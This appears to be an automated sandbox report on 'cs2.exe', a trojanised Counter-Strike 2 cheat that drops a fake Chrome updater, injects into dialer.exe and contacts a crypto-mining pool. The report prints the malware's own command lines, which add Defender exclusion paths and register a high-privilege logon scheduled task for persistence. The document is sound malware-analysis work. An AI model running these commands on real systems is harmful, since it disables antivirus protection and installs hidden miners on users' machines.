Analysis Overview
SHA256: 4a43e95020312d2bc4725f469e6ba1fa66d164842584b916f24606350ab728f6
Threat Level: Known bad
The file cs2.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-06-09 07:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2024-06-09 07:34
Reported: 2024-06-09 07:37
Platform: win10-20240404-en
Max time kernel: 32s
Max time network: 41s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2948 created 3396 | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | C:\Windows\Explorer.EXE |
| PID 3156 created 3396 | N/A | C:\Users\Admin\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Google\Chrome\updater.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2948 set thread context of 3456 | N/A | C:\Users\Admin\AppData\Local\conhost32.exe | C:\Windows\System32\dialer.exe |
| PID 3156 set thread context of 4900 | N/A | C:\Users\Admin\Google\Chrome\updater.exe | C:\Windows\System32\dialer.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
| Image | Command line |
| --- | --- |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k dcomlaunch -s LSM |
| C:\Windows\system32\dwm.exe | "dwm.exe" |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s gpsvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Schedule |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s nsi |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s EventSystem |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Themes |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s SENS |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s UserManager |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s NlaSvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s Dnscache |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k appmodel -s StateRepository |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s netprofm |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc |
| c:\windows\system32\sihost.exe | sihost.exe |
| c:\windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s CryptSvc |
| C:\Windows\sysmon.exe | C:\Windows\sysmon.exe |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s WpnService |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Browser |
| C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s CDPSvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc |
| C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| C:\Windows\system32\ApplicationFrameHost.exe | C:\Windows\system32\ApplicationFrameHost.exe -Embedding |
| C:\Windows\System32\InstallAgent.exe | C:\Windows\System32\InstallAgent.exe -Embedding |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} |
| C:\Users\Admin\AppData\Local\Temp\cs2.exe | "C:\Users\Admin\AppData\Local\Temp\cs2.exe" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbQBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAdgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAZwBiACMAPgA=" |
| C:\Users\Admin\AppData\Local\conhost32.exe | "C:\Users\Admin\AppData\Local\conhost32.exe" |
| C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe | "C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe" |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force |
| C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\System32\schtasks.exe | C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC" |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Users\Admin\Google\Chrome\updater.exe | C:\Users\Admin\Google\Chrome\updater.exe |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force |
| C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#jdikcdmvr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
| C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe |
| C:\Windows\System32\dialer.exe | C:\Windows\System32\dialer.exe |
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:5555 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\conhost32.exe
| Hash | Value |
| --- | --- |
| MD5 | 0ca285f9a8c43016ffe109a13b0e07a0 |
| SHA1 | a03f79912ab0fbfd10ee3ff67bff60671a8ad42f |
| SHA256 | 880123a7fac24705ffb6795713d32fdc21679ac00802e72cb54d86814be4fcf1 |
| SHA512 | b68ee3e6b8499ca4995390d8c614784d13629a326bbac0c9d258813723428cbd830021e68bd78f7ca7d8330c0eeb1b28405f29bb967349a205c98973086ef883 |
C:\Users\Admin\AppData\Local\Temp\cs2-external-esp.exe
| Hash | Value |
| --- | --- |
| MD5 | dfae04e92d343bd110609b8194816131 |
| SHA1 | d1b1f02cb02273f56eef010a52072f6c6a23f071 |
| SHA256 | 807999620cb4783d5c8f282cc21a6c5829e9f99719cbcdb7a71bdacd58671daa |
| SHA512 | 6083ae949fef7c09102ac2d1fd6da30ec38b6044a9fe258a64ec07178cf5a180158a0fda32f76b76d14cff6653a8a17f8a5f15c747625be4a42fe015f48dc2fe |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqv544na.qto.ps1
| Hash | Value |
| --- | --- |
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 84b947076ff79194bd2f2539c80d2fac |
| SHA1 | 154b54aa34a1521d59d373bae20197426707d285 |
| SHA256 | 858af83202a048447e425f4d815fd8faadbe060aa0777c0c1743f577f7b9ff92 |
| SHA512 | dd42a4187f5e806690aeb2f49734da7199e09f92f07125dd9b26aa2da2b8bb3b74db2b2fe3d2a83f75ab900731a1a1bc808923df80b1e239cd43b841499f701f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| Hash | Value |
| --- | --- |
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 4e36cd1fa1e00c532cb82880a8a6097d |
| SHA1 | 2d5a84ef221b0d5637fb854f68eef69d36065c15 |
| SHA256 | f55e8fb411153ce462b5e7cbe4c2e362bb4a73dcaff6e2905aea6eab5a4fb8ca |
| SHA512 | 4910cec0f2ea8c9b1490fa1d95369d97bf8ff80840454ecea0ed50d9427a421fdb5bc914c86a05f92574211a4c7a3f429acbfd950c6d8411ef6fa31fabd2a2e6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | 1d2d913c3dc74c96a90c5f53810a4258 |
| SHA1 | 2ec54878f305c68ff23a03c612563267704db95e |
| SHA256 | 54d6b3b1c9dc258b5ffcdb51148e5c31131d5824d8ce43b78998c3a812b965e9 |
| SHA512 | 8a93c9b24aad835b7a10d8b511b5a8c07f19bcc426b1c15f1b5643822ccc1bdd045e2ea8fd3e5094c00320b9fe45b3cc70700e155992aaca4093c81e349e6853 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Hash | Value |
| --- | --- |
| MD5 | bbb673277fae96ee4bc299672085e949 |
| SHA1 | 731ccb1581a06bff2ca36ca46b20c91c9adc468c |
| SHA256 | 21a0a3c47eb15cec5d37688a67369836fda0164d0cd5afaa9a2aa52fb838685d |
| SHA512 | aa0efc1683991ed68027f0fbd1dfcf0616dd0c328bd015cb43987411e454e0583e8cc1a45bc9f689e873007071e0923d9be10a6db689ba268a167f856b6a8425 |